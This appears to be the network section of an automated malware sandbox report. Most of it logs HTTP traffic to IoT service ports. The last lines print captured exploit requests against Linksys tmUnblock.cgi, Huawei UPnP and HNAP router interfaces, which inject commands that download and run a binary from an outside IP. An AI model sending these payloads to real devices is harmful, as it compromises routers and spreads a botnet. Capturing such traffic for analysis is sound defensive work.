| Source: unknown | Network traffic detected: HTTP traffic on port 37844 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40332 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44830 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33872 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35326 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40886 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50136 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44344 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41116 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41952 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37364 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41744 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41116 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54936 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44096 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45420 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40156 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52080 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41288 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54944 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56666 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37226 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53850 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45592 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59422 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37364 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53986 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47432 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33742 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 33742 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56146 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45918 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54556 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49642 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56146 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41116 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59060 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58596 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39386 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53718 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48006 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41288 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54944 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56146 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34820 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40890 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37184 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60542 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51094 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37980 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37226 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34820 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40890 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37184 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60542 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51094 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42738 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47528 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59770 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54094 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34820 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39186 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55990 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58264 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43930 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53452 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40890 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37184 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60542 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51094 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45376 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47678 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 45376 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56146 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60570 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37226 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42738 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47528 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54094 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58592 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37364 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37844 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46940 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33354 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49046 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38336 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45342 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54336 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37642 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33354 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41116 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56794 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47678 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58592 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56794 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54094 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56146 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44344 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50450 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39322 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47528 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42738 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34694 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47546 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33354 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56794 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53232 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42246 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54148 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39322 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59490 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53328 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58592 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50450 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39322 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37226 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48906 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54076 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42496 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33354 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45918 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33048 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47678 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54094 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58092 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37922 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53630 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51354 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40332 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39322 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41104 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47428 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58182 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41754 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42918 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47428 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42738 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47528 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58092 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55946 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45014 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43268 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45070 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58466 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47428 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48990 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42622 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47428 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56146 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50454 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53000 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37636 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45410 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54082 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37624 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47462 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58592 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60106 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46038 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37364 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39154 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41952 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47428 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58466 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45014 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45070 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55946 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43268 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33354 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50324 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45308 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55582 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41676 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39238 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42622 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34654 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46038 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41116 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38212 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57860 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38948 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52650 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39154 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38212 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38948 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52650 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57860 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39322 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47966 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39014 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47428 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54556 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38212 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38948 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57860 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52650 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46898 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56412 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34574 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56412 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39154 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38450 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47678 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42268 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39344 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39322 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57972 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37226 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44316 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48598 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39890 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54094 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35776 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44374 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42622 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37980 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46630 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48598 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51432 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37680 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46526 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55764 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58274 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50680 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53592 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33736 -> 1723 |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
